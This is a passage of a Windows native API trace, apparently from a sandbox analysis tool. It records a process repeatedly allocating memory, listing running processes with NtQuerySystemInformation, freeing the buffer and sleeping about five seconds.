ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.593] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.594] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.599] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.609] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.612] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.612] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.618] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.621] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.627] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.627] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.638] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.647] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.658] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.663] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.666] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.666] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.671] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.672] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.691] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.692] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.696] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.696] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.701] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.703] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.710] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.719] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.722] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.727] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.729] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.737] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.745] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.746] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.747] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.749] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.754] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.756] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.764] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.766] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.767] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.767] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.774] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.775] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.782] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.784] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.785] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.785] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.794] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.795] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.798] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, 